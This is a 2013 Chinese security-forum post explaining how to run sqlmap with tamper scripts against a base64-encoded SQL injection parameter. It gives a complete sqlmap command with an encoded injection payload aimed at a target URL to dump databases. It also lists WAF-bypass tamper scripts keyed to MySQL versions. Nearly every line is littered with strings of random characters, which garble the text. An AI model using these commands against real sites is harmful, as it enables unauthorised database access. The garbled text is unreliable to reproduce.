找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2310|回复: 0
打印 上一主题 下一主题

SQlMap Tamper注入Base64编码注入点

[复制链接]
跳转到指定楼层
楼主
发表于 2013-11-23 15:50:45 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
WVS扫某站就出来一个SQL Injection,参数还是base64编码的,手工注入麻烦一步,用sqlmap怎么自动注射呢?7 n7 v/ O# b2 K. V4 d& e
" w1 z$ [) k6 A: c: z( ]
sqlmap的tamper里有个base64encode.py
$ Z: A/ ]; U8 c  I
. u: Q  n! p: z1 B, Y% `2 I使用如下
  n3 h( j. _# f4 J" Z
+ Q: [" Z, j  d" csqlmap -u http://ha.cker.in/index.php?tel=LTEnIG9yICc4OCc9Jzg5 --tamper base64encode.py –dbs5 j* J- [" s" p9 f- B( a, K
% r. ?5 ^1 V; Y

. [4 v4 U2 p0 ]8 c4 Esqlmap拥有很多功能强力的插件,插件的使用方法: -- tamper “插件名称”# I) d5 d" ?. H- j: ?
8 i$ Y5 K, D6 ~# u: D
其中常用到的bypass脚本绕过SQLMAP主要两个脚本:
: k* Z# V% K0 t% b2 D. F4 i
6 Q4 Z) H1 B+ T8 E" ?2 {6 I/ Xspace2hash.py ,对于MYSQL数据库 4.0, 5.0注入
" F7 @+ x' h8 Z' h# n; Espace2morehash.py ,对于MYSQL数据库 >= 5.1.13 和 MySQL 5.1.41 注入8 b1 i9 p/ h& D+ T3 w4 e. n, h" n
首先确定目标数据库版本,然后选择相应的脚本。
( ^$ q3 [  a0 x" e1 c& M4 z-v 3 --batch --tamper "space2hash.py"6 E) Y+ H8 c7 i7 j; _$ q8 u

9 P) T8 I/ [: M; }. U! m7 ]7 H8 O还有其他一些插件:* H/ s8 K" F6 `/ }- b5 Y
encodes编码 ——charencode.py, v, I# m$ k$ G: @7 H
base64编码 —— base64encode.py1 r: d! ~6 e+ S& l+ }$ T) D8 t0 V
替换空格和关键字 —— halfversionedmorekeywords.py
, T! ]* `/ \0 l( x
" m/ x! j& m! U8 e$ }. C
; b+ t: K' u, x7 M0 K0 Q: U2 j
9 A& |4 B% t  A( k

) ]- N3 @6 Y( p+ n
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表